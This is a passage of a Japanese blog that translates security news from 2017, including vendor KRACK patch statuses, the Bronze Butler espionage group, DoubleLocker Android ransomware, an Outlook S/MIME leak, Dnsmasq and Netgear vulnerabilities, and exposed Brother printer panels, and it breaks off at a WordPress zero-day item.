    Microsoft
    Microsoftは、10月の定例のパッチ(Patch Tuesday)でKRACK脆弱性をコッソリ修正していた。

    MikroTik
     MikroTikによると、「RouterOS v6.39.3, v6.40.4, v6.41rcは影響を受けない! APモードデバイスは影響を受けない。実装された全ての修正は、ステーションとWDSモードにのみ言及される。」 彼らは更に、ファームウェアバージョンは、この問題を修正するために先週リリースされたと述べている。

    Netgear
    Netgearは、KRACKの影響を受ける製品リストと関連するアップデートを含むアドバイザリをリリースしている。

    OpenBSD
    OpenBSDは、この脆弱性を静かにアップデートし修正するパッチを提供している。詳細な情報は、コチラコチラで読むことができる。

    Open-MeshとCloudTrax
     アドバイザリは、Krack脆弱性に関連したOpen-MeshとCloudTraxに関して投稿された。アップデートは、10月17日までに自動アップデートを使用して、これらの全てに対して配布されることが予定されている。アドバイザリに詳細。

    pfSense
     pfSense(FreeBSDをベースにしている)は、FreeBSDの修正をインポートするためのを始めた。

    Qualcomm
    Qualcomm広報担当は、BleepingComputerに以下のように告げている。

     「頑強なセキュリティとプライバシーをサポートするテクノロジを提供することは、Qualcomm Technologies, Inc.にとって最重要である。我々は、Qualcomm-powered製品中で再使用されるWPAパケットナンバーを改善するために、オープンソースセキュリティ問題を持つ全てのインプレメンテーションを同定し解決するために産業パートナーと共同作業している。この問題のパッチは、Code Aurora Forumと、他のディストリビューション チャンネルで現在利用可能であるし、追加のパッチは、我々の品質保証プロセスで検証されると、直ちにポストされる。」

    Red Hat
     Red Hatは、wpa_supplicant中の脆弱性に関するアドバイザリを作成している。利用できる更なる詳細は存在していない。

    Sierra Wireless
     Sierra Wirelessは、影響を受ける製品と改善計画に関するテクニカル・ブレティンをポストしている。CERTからのリンク。

    Sonicwall
     Sonicwall技術サポートは、KRACKに関するアドバイスを直ぐにアップすることを希望しているとBleepingComputerに告げている。

    Sophos
     Sophosは、アドバイザリをリリースし、Sophos UTM Wireless, Sophos Firewall Wireless, Sophos Central Wireless, Cyberoam Wireless製品が、Krack脆弱性の影響を受けると述べている。これらの製品のアップデートは直ぐにリリースされるだろう。

    Synology
    Synologyは、WiFiドングルに接続されているSynology DiskStation Manager (DSM)と、Synology Router Manager (SRM)が、KRACKに対する脆弱性があることを表明するアドバイザリをポストしている。Synologyによると、影響を受ける製品用のアップデートは直ぐにリリースされる。

    東芝
     CERTによると、東芝のワイアレスLANアダプタの付いたSureMark 4610 Printer (型番 1NR, 2CR, 2NR)と、Canvio AeroMobileワイアレスSSD製品が影響を受ける。東芝は、プリンタに関しては、所有者とビジネスパートナーに直接接触することにしている。そして、ワイアレスSSDカードに関しては、ファームウェア アップデートが行われる。

    TP-Link
     私がTP-Linkの技術サポートに接触した時、「我々の上席は、この問題に目を光らせている。現在、我々は、TP−Linkの製品が、この影響を受けたという如何なるフィードバックも受けとってていない。我々が、何らかの新しい情報を入手したなら、我々の公式のWebサイトでアップデートを提供する」と、告げてきた。

    Turris Omnia
    OpenWRTを使用しているTurrisは、彼らのフォーラムに、パッチは彼らが修正をテストしリリースする予定のレポジトリに追加されたと投稿している。願わくば、これが、同様に早急にOpenWRTのアップデートのリリースを導かんことを。

    Ubiquiti
     Ubiquitiは、UAP/USW用に、WPA2 KRACK脆弱性を解決するファームウェア バージョン3.9.3.7537をリリースしている。

    Ubuntu
     Ubuntuは、この問題を解決するために、wpa_supplicantとhostapdをアップデートする方法に関する情報の付属するアドバイザリをリリースしている。

    WatchGuard
    WatchGuardは、彼らの様々な製品とサービスに関して、アップデートが利用可能になる時期を含むアドバイザリをリリースしている。

    WiFi Allianceの告知
     WiFi Allianceは、KRACK脆弱性に関する告知をリリースしている。

    Zyxel
     Zyxelは、どの製品が影響を受けるのかを詳らかにするページを作成している。彼らは、この脆弱性を修正するための作業中であるが、利用可能はドライバやファームウェアのアップデートは存在していない。

    KRACKの影響を受けないと主張する企業

    Arista Networks, Inc.
    Lenovo
    Vmware

    情報提供をしていない企業

    Juniper Networks
    3com Inc
    Actiontec
    Alcatel-Lucent
    AsusTek Computer Inc.
    Atheros Communications, Inc.
    Barracuda Networks
    Broadcom
    CentOS
    D-Link Systems, Inc.
    Edimax
    EMC Corporation
    Extreme Networks
    F5 Networks, Inc.
    Foundry Brocade
    Hewlett Packard Enterprise
    IBM, INC.
    Kyocera Communications
    Marvell Semiconductor
    MediaTek


    サイバースパイ グループが日本企業に対するキャンペーンをセットアップ
    Kaspersky : ThreatPost (2017/10/14)
     研究者達は、サイバースパイ グループBronze Butlerについて詳細を確認中である。このギャングは、2012年以来、日本の重工業をターゲットにし続けている(このグループの現在の手口については、あまり知られていない)。
     SecureWorks(Dell Technologiesの子会社)のCounter Threat Unitによって木曜日にリリースされたレポートで、研究者達は、今までで最も完全なこのグループ(Tick(ダニ)として知られる)の絵を描いている。
     「ここ12ヶ月、(SecureWorks)は、Bronze Butler脅威グループによって様々な日本の組織に実行された幾つかの侵入を調査した。このグループの活動は、少くとも2012年以降大部分は検出されていなかったが、多分、長く活動していた」と、Threatpostのインタビューで、SecureWorksの上級セキュリティ研究員Matthew Websterは、発言している。
     その発端以来、SecureWorksは、Bronze Butlerが中華人民共和国から作動していたと確信している。このグループは、重大なインフラストラクチャ、重工業、製造及び国際関係に関連する日本企業から知的財産と他の機密データを抜き取ることを主眼としていた。
     今週リリースされたレポートにおいて、SecureWorksは、このグループによって使用された戦術及び戦略の推移を明らかにした。研究者によると、ユニークなマルウェアツールを開発するために、0-Dayの悪用を思いつくと、Bronze Butlerは、その知識と経験を増強し、日本のシステム管理者によって使用されるデスクトップ管理ツールを悪用することで益々効果的にしてきていた。
     Bronze Butlerについて何か知っているか? 多分中国に存在し、日本をターゲットにしていることに加えて、研究者は、このグループが、スピアフィッシング(【訳注】 特定の人物を狙い、偽のメールを送ったりウイルスを仕込んだりしてパスワードや個人情報などを詐取する詐欺(IT用語辞典より))、戦略的Web改竄(【訳注】 攻撃者は、標的にした組織や企業に侵入するために必要な「戦略的な情報」を収集します。この段階の収集方法は、軍事上の偵察活動に例えることができます。収集された情報には「標的にした組織のメンバーや企業の社員たちがどのようなサイトを「信頼できるサイト」として頻繁に閲覧しているか」といった見解などが含まれています。こうした情報に基づいて改ざん対象のWebサイトを選定する過程は、初期には「戦略的Web改ざん」とも呼ばれていました(Trend Microセキュリティ情報より))、ターゲットのシステムに侵入するために0-Dayの脆弱性を利用していた。
     「このグループは、マルウェアをダウンロードし実行(カスタマイズ)するためにFlashアニメーション添付ファイルの付いたフィッシングeMailを使用し、戦略的Web改竄攻撃にFlash脆弱性攻撃を活用していた」と、研究者は記述している。
     SecureWorksによると、日本の組織への幾つかの侵入を調査している時、SecureWorksは、Bronze Butlerが、SKYSEA Client View(【訳注】 企業・団体における情報漏洩対策の徹底と、IT運用管理を支援する(Sky株式会社Webサイトより))と呼ばれる日本の企業に人気のあるデスクトップ管理ツール中にAdobe Flashの0-Dayの脆弱性を悪用していることを発見した。
     「この脅威グループが、人気のある地域的IT製品中の脆弱性を発見し武器化できるという事実は、このグループの能力と、犠牲者たる彼らのターゲットを成功裡にセキュリティ侵害するための確固たる献身に対する更なる理解を与える」と、Websterは発言している。
     SecureWorksは、Bronze Butlerが、このグループ専用のプロプライエタリ・マルウェアツールを開発し配備する ための習熟度を持っていると発言している。これらのツールの一つは、Daserfと呼ばれるマルウェアである。このマルウェアは、コマンドを実行するために、データをアップロードしたりダウンロードしたりするために、スクリーンショットをキャプチャするために、キーストロークをログするために、敵対者にリモートシェルを与えるバックドアとして機能するものである。
     このグループは、時間の経過と共にこのツールの二つのバージョンを開発したようである。2016年、このグループは、Daserfの使用からxxmmとDatperと呼ばれる二つのリモートアクセス・トロイ(RATS)にシフトしたかのようであると、Websterは発言している。

    Palo Alto NetworksのUnit 42で7月24日に公開されたレポートよると、Bronze ButlerのDaserfマルウェアは、類似のバックドアMinzenだけでなくGh0st RATやダウンローダーHomamDownloaderと共謀し9002 RATとして特定されるRATと共に共有インフラを監視していた。
     意図としては、Bronze Butlerは、重要なビジネスと販売関連情報をほぼ例外なくターゲットにしていた。比較すると程度は低いが、Bronze Butlerはまた、ビジネスと販売関連情報と連動したネットワークやシステム設定ファイルも追いかけている。
     このレポートによると、「知的財産、製品の詳細、企業情報に主眼を置くことは、このグループは、彼らが信じている情報が競合他社に価値があるかもしれないと考えていることを示唆している。」 研究者は、Bronze Butlerのターゲットの多様化は、様々なグループリーダーが、そのグループに複数の目標の実行を課していることを示唆していると追加している。
     このグループの活動の範囲は、おそらくまだ完全には実現されていないので、我々は、依然としてBronze Butlerが活発であり、脅威の状況の大変有能なコンポーネントであると評価している」とWebsterは発言している。


    Android用の身代金要求型マルウェアDoubleLockerは、データを暗号化しPINを変更する
    The Register : Security (2017/10/13)
     悪党共は、ユーザのデータを暗号化すると共に、PINを変更することでセキュリティ侵害したデバイスから犠牲者を締め出すAndroid用の身代金要求型マルウェアの株を考えだした。
     DoubleLockerは、小狡い感染メカニズムと、犠牲者から金銭を強請り取る二つの強力なツールを結合している。
     「そのペイロードは、犠牲者がそのデバイスにアクセスすることを妨げるために、そのデバイスのPINを変更し、そして、犠牲者のデータを暗号化する」と、「このような組み合わせは、Androidの系では、今迄確認されていない」と、Lukas Stefanko(DoubleLockerを発見したセキュリティ企業ESETのマルウェア研究者)は、発言している。  「DoubleLockerは、Androidのユーザ補助サービス(accessibility service)を悪用している。そして、これはサイバー犯罪者の間では人気のトリックである。」
     この汚らわしい物は、バンキング・トロイをベースにしている。これは、アカウント改竄機能を簡単に追加できることを意味している。
     このAndroid用マルウェアは、その親株であるPC版と、まさに同じ方法(セキュリティ侵害されたWebサイトを介して押し付ける、インチキのAdobe Flash Playerのアップデート)で拡散している。
     稼働すると、このアプリケーションは、"Google Play Service"と名付けられた、このマルウェアのユーザ補助サービスのアクティベーションを要求する。このマルウェアが、アクセス許可を取得すると、デバイスの管理者権限をアクティベートするために、これらのアクセス許可を使用し、このマルウェア自体をDefaultのホームアプリケーションに設定する。両方共にユーザの同意なしに実行される。
     「それ自体をDefaultのホームアプリケーション(ランチャ。【訳注】 電源を入れた時に表示される画面を作り出しているアプリケーション)に設定することは、マルウェアの永続性を改善するトリックである」と、「ユーザがホームボタンをクリックするたびに、この身代金要求型マルウェアはアクティベートされ、そのデバイスは再びロックされる。ユーザ補助サービスを使用することで、ホームボタンを押すことによって、マルウェアを起動していることをユーザに認識されなくてすむ」と、Stefankoは発言している。
     セキュリティ侵害されたデバイスに植え付けられたDoubleLockerは、犠牲者に支払いを求める二つの理由を作成する。一つ目、犠牲者にそのデバイスの使用を実際上できなくするために、そのデバイスのPINを変更する。二つ目、DoubleLockerは、そのデバイスのプライマリ・ストレージ・ディレクトリの全てのファイルを、AES暗号化アルゴリズムを使用して暗号化する。

    DoubleLockerの脅迫状

     この身代金額は、比較的穏当な 0.0130 Bitcoin(凡そ 54$(概ね6000円))に設定されている。DoubleLockerの非ルートデバイスをクリーンにする唯一の実行可能なオプションは、工場出荷状態にリセットすることである。ルートデバイスのPINロックを回避することは、簡単ではないが可能である。暗号化されたファイルは簡単に復元することはできない。


    Outlookは、S/MIME暗号化を使用すると、eMailを暗号化しないかもしれない
    BleepingComputer : News>Security (2017/10/11)
     S/MIME規格で暗号化した安全なeMailを送信するために、Outlookを活用しているユーザは、Outlookのバグにより、それらのeMailの内容がリークされる可能性がある。
     この問題は、Outlookが暗号化と非暗号化の両方の形式でeMailを送信していることにある。eMailトラフィックをスヌーピングすることができる攻撃者は、これらのeMailの内容を読むことができるかもしれない。
     このバグは一般的な問題ではないが、以下で説明される特定のシナリオの下でのみ現れる。

    ・ S/MIME公開鍵暗号化基準で暗号化されたeMailだけが影響を受ける。PGP/GPGは、影響を受けない。
    ・ 暗号化されたeMailのリークは、Outlookを使用して送信されたeMailのみに発生する。Outlookで受信した場合ではない。
    ・ このリークは、plaintext(平文)で送信されたOutlook eMailにのみ発生する。DefaultのOutlook設定は、HTMLフォーマットを使用している。
    ・ リークは、ユーザがplaintext(平文)eMailに対する返信を暗号化しようとした時にも発生する。Outlookは、そのようなeMailに返信するとき、DefaultのHTMLフォーマットを、自動的にplaintext(平文)に変更する
    ・ このリークは、ユーザが、SMTPサーバでOutlookを利用している場合には、常に発生する。
    ・ このリークは、Microsoft Exchangeインフラストラクチャを使用しているOutlookクライアント用の一つのサーバーホップ(【訳注】 ホップ数: 目的のサーバーに接続するために、プロバイダーのルーターなどを経由していく数(ASCII.JPデジタル用語辞典より))にだけ発生する。これは、暗号化されたeMailのリークを企業ネットワーク内部に制限する。TLSは、eMail通信に関しては無効化されざるを得ない。
    ・ リークはまた、受信者のeMailクライアントでも発生する。eMailクライアントは、eMailメッセージのプレビューを表示するので、たとえ攻撃者が、標的の秘密鍵へのアクセスを持っていない場合でさえ、攻撃者は、暗号化されたメッセージの内容を閲覧することができる。例えば、犠牲者のeMailパスワード(犠牲者のS/MIME秘密鍵ではない)へのアクセスを取得した攻撃者は、犠牲者が受け取った暗号化されたメッセージ(リークしやすいOutlookを実行しているユーザによって送信された)の一部を読むことができる。

     たとえ、上述のシナリオに限定された場合でさえ、暗号化リークは重要な問題である。企業は、重要な情報をeMailで交換するとき、この情報を守るために暗号化を使用する。殆どのバグと脆弱性の報告も、暗号化されたフォーマットで処理されている。

    Microsoftは、真の影響について口を閉ざしている

     SEC Consultの研究者は、今年前半、偶然にOutlook S/MIME暗号化eMailのリークを発見した。他のユーザも、一ヶ月後、Microsoftのフォーラムに同じ問題を通知した
     研究者達は、彼らが、この問題に関してMicrosoftに接触し、Microsoftは、このバグ(CVE-2017-11776)に関する修正を、昨日の2017年10月のPatch Tuesdayでリリースしたと、発言している。
     Microsoftは、Outlookのどのバージョンが、この問題の影響を受けるのか、今迄にリリースされたOutlookの全てのバージョンが、このバグの影響を受けるのか、それとも、SEC Consultがこの問題を発見した2017年5月以降にリリースされたバージョンだけなのか、明らかにしていない。
     差し当たり、CVE-2017-11776悪用のシナリオに該当する企業は、Outlookクライアントをアップデートし、その後、危険に晒されるようなeMailを、S/MIME-encryptedを介して送信するように、全ての情報を処理すべきである。


    Microsoftは、コッソリWindows 10のセキュリティホールを修正したが、Windows 7,8は、寒空の下に放置されている
    The Register : Security (2017/10/06)
     MicrosoftはコッソリWindows 10のセキュリティバグをパッチしているが、Windows 7, 8に対しては同じアップデートを即座にリリースしていない。潜在的に、数億のコンピュータに攻撃のリスクが残されている。
     ハッカーとマルウェアによって悪用可能なフローと他のプログラミングの大失態は、Windows 10のビッグ・リリース(Anniversary UpdateやCreators Updateのような)で一掃され修正された。しかし、この重要な修復作業は、たとえ、Windows 7とWindows 8への月例のソフトウェア・アップデートで撤回していたとしても、あまりに緩慢である。
     これは全て、Googleの優秀なProject Zeroチームによるものである。恐ろしいのは、Windowのパブリック・ビルドを比較している悪党共が、Windows 10でコッソリ修正されたこれらの脆弱性に気が付き、この同じセキュリティホールをWindowsの今までのバージョン(これらは依然として世界中の家庭と企業で使用されている)中に存在していることを認識され、システムに感染し、人々をスパイするために、このバグが悪用されることである。ハッカーがこれを認識していなかったとしても、Googleの職員が、この問題に関してブログで公開したので、彼らは今、認識するだろう。
     Microsoftの技術者は、Windows 10オペレーティングシステム中のコンポーネントを改善する努力の一部として、これらWindowsのセキュリティホールをコッソリ解決している。例えば、或るチームは、カーネル中のメモリ管理を改善するための仕事をしている、結果として、彼らは、一塊のソースコードを書き直す(途中であらゆる厄介な攻撃可能なバグを潰し、ソフトウェアのパフォーマンスは向上させるために)。マーケティングの部署に関しては、これは、ローディング・タイムの高速化を自慢できる素晴らしいニュースである。一方、マルウェア開発者は、Windows 8、7に依然として存在するプログラミングの大失態を発見したら、祝うことができる。
     「Microsoftは、最も最近のWindowsプラットフォームにのみ、構造的セキュリティ改善の数値導入や、時々、通常のバグでさえ修正することが知られている」と、Google Project Zeroの研究者Mateusz Jurczykは、火曜日に語っている。
     更に、「これは、今までのシステムのユーザに対してセキュリティの誤った感覚を作成し、Windowsの異なるバージョン中で対応するコードの僅かな変更に焦点を当てることで、簡単に検出可能なソフトウェア・フローに対して、それらのシステムを脆弱性があるまま放置する」と、付け加えている。
     問題の一例として、Jurczykは、カーネル中でのmemset()の不安定な使用に焦点を当てている。これは、メモリの特定領域中のバイトを特定の値(0のような)で上書きすることを前提としている関数であり、それ故、メモリのその部分に今まで格納されていたものが何であれ取り去る。
     このカーネルが、NtGdiGetGlyphOutlineシステムコールを介して、情報でメモリ領域を満たすようにアプリケーションによって、それを、そのアプリケーションのメモリスペースにコピーするように命令された時、このOSは、コピー操作に先立って、memset()を使用するための領域を完全に上書きしない。これは、残っているプライベートなカーネルデータをアプリケーションのメモリスペースにコピーして終了することを意味している。それ故、あってはならない情報のリークが起こる。これは、OSや他のプログラムをスヌーピングするのには役に立つ。あるいは、より大きなダメージを与える脆弱性攻撃をやり通すために、システムの内部オペレーションの仕組みを十分に獲得するのに役に立つ。
     この情報公開されたバグは、Windows 10では修正されたが、今年5月の終わりにProject ZeroがMicrosoftに通知するまでWindows 7とWindows 8.1では残ったままになっていた。そして、9月にWindows 7とWindows 8.1用のパッチで修正された。Googleは、公開する前に、開発者と企業に行動を起こさせるために、一般的に、通知されたセキュリティ上の欠点を解決するために90日の猶予をベンダ(Microsoftを含む)に与えている。
     Windowsの以前のバージョンへのパッチの配備に関する数カ月のタイムラグは、攻撃に対してシステムを脆弱なままにしていた。Windows 10のセキュリティ防御を広汎にアップグレードすることで、Microsoftは、ハッカーが今までのバージョン中で悪用できる弱点の発見をより簡単にしている。
     「顧客の一部を攻撃に晒したままにしているだけでなく、どのような攻撃ベクトルかも明らかにする、これはユーザセキュリティに真っ向から対立するものである」と、Jurczykは説明している。
     「これは、カーネルメモリ公開や、追加されたmemsetコールのような、明らかな修正にあたるバグ・クラスに当て嵌まる」
     ベンダがメジャー・アップデートを持続することを、以前のソフトウェア・バージョン(Windowsユーザの半分程度が、Windows 7, 8を依然として稼働している)へのパッチを無期限に作成してくれることを期待するのは現実的ではない。これは、皮肉なことに、数百万の人々が、Windows 10のセキュリティ改善によってリスクのある状態に置かれていることを意味している。
     Windows 8.1は、2013年1月10日まで、Windows 7は、2020年1月14日まで、定例のセキュリティ・フィックスを受け取るとされている。
     「Windowsは、通知されたセキュリティ問題を調査し、可能な限り早急に影響を受けるデバイスを率先してアップデートするという顧客に対する責任を持っている」と、MicrosoftのスポークスマンははThe Registerに告げている。
     「更に、我々は継続的に多重防御セキュリティに投資している。そして、顧客にWindows 10と、最高の防御のためにMicrosoft Edgeブラウザの使用を推奨している。」
     (【訳者補注】 このMicrosoftの発言を)翻訳: 「どうか、どうか、どうか、Windows 7, 8の使用を止めてください。」


    Dnsmasq脆弱性はホーム・ルータとIoTデバイスを危険に晒している
    Bitdefender : BOX (2017/10/06)
     Googleの脆弱性研究者達は、インターネットに接続されるデバイスで実行されるコード中に、悪用可能なソフトウェアのフローを明らかにした。このフローは、遠隔から彼らが選択した任意のコードを実行することをハッカーに可能にするものである。
     このDnsmasqネットワーク・サービス・ソフトウェア(設定が簡単なことと、リソースに対する影響が少ないことから人気がある)は、一般的に多種多様なシステム(Linuxディストリビューション、ホームルータ、IoTデバイスを含む)にプレインストールされている。
     月曜日に公開されたブログポストに於いて、Googleの研究者は、通常のインターネットセキュリティ検証を行っている間に、Dnsmasq中に「7つの異なる問題」を発見したと説明している。

     このフローの一つは、"trivial-to-exploit"(悪用するには些細な)DHCPベースのバッファオーバーフロー脆弱性として説明されているが、他の情報漏洩用の脆弱性攻撃と結合することで、システムの防御をバイパスし、リモートコード実行を獲得できる。
     簡潔に、攻撃者は、脆弱性のあるデバイス上で悪意あるコードを実行し、彼ら独自の目的のためにそのデバイスを乗っ取るために、このフローを悪用することができる。我々が過去に何度も見てきたように、悪意あるハッカーは、 DDoS攻撃のような犯罪行為を支援し、セキュリティ保護が不十分なIoTデバイスの制御を掴むことが、いとも簡単であることを理解している。
     特定の場合においては、攻撃者は、脆弱性のあるデバイスを悪用するために、通常より多少工夫する必要があるかもしれないが、それでも、あなたは、実行しているネットワーク中に、リスクのあるデバイスを存在させたくないでしょ?
     Shodanでの検索は、現在Dnsmasqサービスを実行してインターネットに接続しているデバイスが凡そ110万台あることを明らかにしている。
     Googleの研究チームは、問題の重大性が認識された後、彼らは修正版を作成するためにDnsmasqのメンテナ達と共同作業した。この修正版は既にバージョン2.78としてリリースされており、10月のAndroidの月例セキュリティアップデートにも含まれている。
     私の懸念は、製造メーカの一部がIoTデバイスとルータを大変低価格で販売し、ちっぽけなマージンを得ていることにある。結果として、これらのメーカは、彼らのユーザベースに対しパッチを開発しリリースすることに何のインセンティブも感じていないだろう。例え、あらゆるアップデートに関わるインフラが、実際に利用可能であったとしても。
     いつものように、アップデートに関してあなたのファームウェア製造メーカーに煩く言うようにしなさい、もしくは、そのような会社の製品を買うか否かによって自身の考えを表明することを考慮しなさい(最新の脆弱性に対して、あなたのIoTデバイスをパッチし続けようとしないこのようなメーカをボイコットするために)。 


    数百のプリンターがバックエンド・パネルとパスワード・リセット機能をオンラインに晒している
    BleepingComputer : News>Security (2017/10/05)
     セキュリティ研究者は、凡そ700のブラザーのプリンターがオンラインに晒されたままになっていることを発見した。これは、何を探したらいいのかを認識している者なら誰もがパスワード・リセット機能にアクセスすることを可能にするものである。
     NewSky Securityの主幹研究員Ankit Anubhavによって発見されたこれらのプリンタは、インターネットを介して、それらの管理パネルへの完全なアクセスを提供する。
     Anubhavは、Bleeping Computerに対して発覚したプリンタのリストを提供した。幾つかのURLに無作為にアクセスすることによって、Bleeping Computerは、広汎なブラザーのプリンタモデル(2~3例を上げると、DCP-9020CDW, MFC-9340CDW, MFC-L2700DW, MFC-J2510のような)を発見した。
     幾つかあるこれら露出の発生原因の一つは、管理パスワード無しにプリンタを出荷したブラザーの選択である。殆どの組織は、十中八九、管理パネルが広汎な接続に対して開いていることを理解せずに、彼らのプリンタをネットワークに接続している。これらのプリンタは、ShodanやCensysのようなIoT検索エンジンを介して、今や簡単に発見可能である。

    研究者は影響を受ける組織に通知することを計画している

     「私は大変多くの知名度の高い大学がこのリストに含まれていることに驚いている」と、AnubhavはBleeping Computerとの個人的な会話の中で発言している。
     大学以外でも、企業ネットワークや政府ネットワークと疑われるものにも、幾つかのプリンタが存在している。
     「私は同僚と共に、組織に連絡し通知することを計画している」と、Anubhavは発言している。
     Bleeping Computerもまた、仲間の研究者Victor Geversに、このリストを転送した。Geversは、GDI Foundation(脆弱性、マルウェア、他のサイバー脅威によって影響を受ける組織に通知することに特化した非営利団体)の議長である。
     「我々は可及的速やかに、このリストを処理するだろう」と、Geversは本日早朝Bleeping Computerに告げてきた。

    管理パネルを広汎に開きっぱなしにするインターネットの脅威

     昨日、Virus Bulletin 2017セキュリティ・カンファレンスで、雑誌Virus Bulletinの編集者Martijn Grootenは、セキュリティ実行者は、リスクを明確に伝える責任を持っていると発言している。
     インターネットに接続されるプリンタを持つことに関して正当な使用の場合もあるが、我々は、Mr. Grootenでさえ、プリンタの管理パネルをパスワード無しに露出したままにすることに対してアドバイスするであろうことを確信している。
     例えば、攻撃者はプリンタのパスワードを変更することができるし、影響を受ける組織に対して停止時間を発生させることができる。

    ブラザーのプリンタの管理パネル

    ファームウェア攻撃は簡単である

     AnubhavがBleeping Computerに提供したリストは、ブラザープリンタのパスワード・リセット・セクション固有の"password.html"ファイルを露出するデバイスだけしか含んでいない。一部のこれらプリンタ用のパネルはまた、ファームウェアアップデートの検証とトリガーのためのオプションを含んでいる。
     通常のスマート・デバイス(【訳注】 パソコンやメインフレーム、ワークステーションなどの既存のコンピュータの枠にとらわれない情報機器の総称。明確な定義はない(Wikipediaより))に関しては、ファームウェア アップデート プロセスが、攻撃者に、そのプロセスを乗っ取られ、汚れたファームウェアを配布される可能性のある脆弱性を含んでいた場合でさえ、この攻撃は、認証されていない攻撃者の、そのページヘのアクセスをブロックすることによって、しばしば緩和される。
     プリンタ管理パネルを広範囲にわたってオンラインに晒すことは、この防御を削除することになる。攻撃者は汚れたファームウェアをアップデートするように挙動するスパイウェアのようなものを含めることができ、攻撃者のサーバに印刷されたドキュメントのコピーを送信することができる。
     民間企業と政府組織の場合、これは非常に重要な情報を晒される可能性がある。
     この戦いは、NewSkyとGDI研究者が、可能な限り多数の影響を受ける組織に通知することにかかっている。
     ブラザーのプリンターを稼働している組織は、そのプリンタが、Defaultで、オンラインに管理パネルを晒すか否か、そしてまた、そのデバイスへの非認証アクセスを妨げるためのカスタム・パスワードを設定できるか否か、検証しなければならない。


    NetGearがルータ、スイッチ、NASデバイス中の50の脆弱性を修正
    Kaspersky : ThreatPost (2017/10/02)
     Netgearは最近、ルータ、スイッチ、NASデバイス、ワイアレス・アクセスポイントに関して、リモートコード実行から認証バイパスフローに至るまでの脆弱性を解決する50のパッチをリリースした。
     このパッチの内の20は、「高」と評価される脆弱性問題を、残りの「中」と評価されるセキュリティリスクと共に解決している。Netgearは、このバグに関するアドバイザリを、この二週間に渡り彼らのWebサイトに投稿している。
     Netgearは、ネットワーク・セキュリティ企業Beyond Securityが、先週パッチされた脆弱性の内の一部を発見していたことを認めている。この問題の一つは、1.4.3-17(x86)と1.1.4-7(ARM)以前のバージョンを実行しているReadyNAS Surveillanceアプリケーション中のコマンド・インジェクション脆弱性であった。コマンド・インジェクション攻撃は、ホスト・オペレーティングシステム上で、システム・シェルにデータ(フォーム、クッキー、HTTPヘッダ)を提供する危険なユーザの通過を促進するものであり、脆弱性あるアプリケーションを介して任意のコマンドを実行できる。
     「これらは全て、ユーザインプットの不十分な認証、認証すべきかすべきでないかということに関する見落とし、彼らの製品Webインターフェースにアクセスしているユーザに関して執行するセキュリティの不適切なメカニズムのようなことによって発生した脆弱性である」と、「私は、Netgear製品の多くが同じコードベースと同じ基底コード構造を共有しているので、彼らの製品の多くに脆弱性が発生するのだと確信している」とBeyond Securityの設立者兼最高経営責任者Noam Rathausは発言している。
     Beyond Securityは更に、Trustwaveの研究者Martin Rakhmanovと、ON-X Securityの研究者Maxime Peterlinが、Netgear製品中の脆弱性を発見していたこともまた認められたと追加している。
     「報道されたこの問題の一部は、大変深刻である」とRakhmanovは発言している。これらの脆弱性の一つ(PSV-2017-1209)は、コマンドインジェクション・セキュリティ脆弱性であり、脆弱性のあるファームウェアを実行中の17の消費者向けルータに関連している。
     「この脆弱性は、このルータの完全制御を任意のローカルユーザに可能にするものである」と、続けて「幸いにも、『リモート管理権限』はDefaultでONになっていないが、もしも手動でこれをONにすると、インターネット上の全ての者に対して、このルータを脆弱にする」と、Rakhmanovは発言している。
     Netgearは、先週公開された脆弱性とパッチの殆どは、この会社のバグバウンティ・プログラム(Bugcrowdとのパートナーシップで一月に起動した)を介して通知されたと、Threatpostに告げている。開始以来、この会社は、このプログラムを介して幾つかの公開を行ってきた(今年初めに報道された数十万台のNetgearルータに発見されたパスワード・バイパスのバグを含む)。
     公開のつい最近のウェーブでは、ProSAFE M4300 Intelligent EdgeシリーズのスイッチのようなIoTアプリケーションで使用されるネットワーキング・ギアから、消費者向けグレードNetgear D6400ワイアレスルータに至るまでの範囲の製品に影響を与えている。
     「我々は製品のセキュリティを大変深刻に受け止めている、そして、潜在的セキュリティ脆弱性のインスタンスを監視するBugcrowdと密接に作業してきている」と、更に「我々は、潜在的な脆弱性の同定と大量の修正のリリースに関しBugcrowdと共同作業している。これが、先週あなたが大量の修正に遭遇した理由である」と、Netgearのスポークスマンは発言している。
     この会社は、将来、公開をより均等に配布するためにプロセスを自動化するように作業中であると発言している。
     Netgearは、伝えられるところによると、脆弱性の技術的主張と、それに続く調整されたアドバイザリを認識する時に、故意にモタモタしたとして、過去にBeyond SecurityのRathausによる批判に直面している。
     Trustwaveの観点からは、Netgearは正しい方向に向いている。「我々は、かなり長い期間、彼らの責任ある公開プロセスを介してNetgearと共同作業した、そして、バグバウンティ・プログラムへ彼らが現在参加していることを含め、彼らが途方もなく成熟してきたことを見てきた」と、Rakhmanovは発言している。
     この一年で、バグのパッチを緊急発進させたネットワーク機器企業はNetgearだけではない。先月、独立系の研究者Pierre Kimは、D-Linkによって製造されたワイアレスルータに粗1ダースの緊急の脆弱性があることを発見した。4月、IOActiveの研究者は、Linksysルータのモデルに、サードパーティーに再起動やロックアウトを可能にしたり、影響を受けるデバイスから重要なルータのデータを抽出することを可能にする20を超える脆弱性を発見した。ASUSは、人気のあるRTルータの30モデルに脆弱性が存在していることを5月に報告した。
     Rathausは、ルータとIoTベンダは、数年間、製品のセキュリティ、テスト、ハードニング(【訳注】 脆弱性を減らすことでシステムのセキュリティ堅牢にすること(Wikipediaより))に関して全く努力していないと、彼は主張している。
     「今日、Shodanのようなサイトを使用して、あなたは、如何なる認証も、デバイスのIPアドレスの代わりになる如何なる情報も要求することなくデバイスのセキュリティ侵害を許す深刻なバグに全く脆弱な数百から数十万のデバイスを配置することができる」と、Rathausは発言している。
     Rathausは、この企業の研究者達は、今年だけで60もの類似の認証バグを報告していると発言している。
     「時々、ユニークな(新しいタイプの脆弱性)が現われるが、多くの場合、それは何度も繰り返される同じタイプの脆弱性である」と、「ベンダは、製品を公開する前に、これらのバグを見つけ出すために十分な時間をかけていない」と、彼は発言している。


    WordPressの3つのプラグインに0-Dayの脆弱性
    BleepingComputer : News>Security (2017/10/02)
     数分前にWordPressセキュリティ企業Wordfenceによってリリースされたセキュリティ警告によると、ハッカーはWordPressのサイト上にバックドアをインストールするために3つの0-Dayのフローを悪用している。
     この0−Dayは、3つのWordPressプラグイン(Appointments, RegistrationMagic-Custom Registration Forms, Flickr Gallery)に作用する。
     このプラグインの製作者は攻撃ベクトル(3つ全てのプラグインに同じ方法で作用するPHPオブジェクト・インジェクション脆弱性)を修正するためのアップデートをリリースした。

    0-Dayは、脆弱性のあるサイトにバックドアをインストールすることをハッカーに可能にする
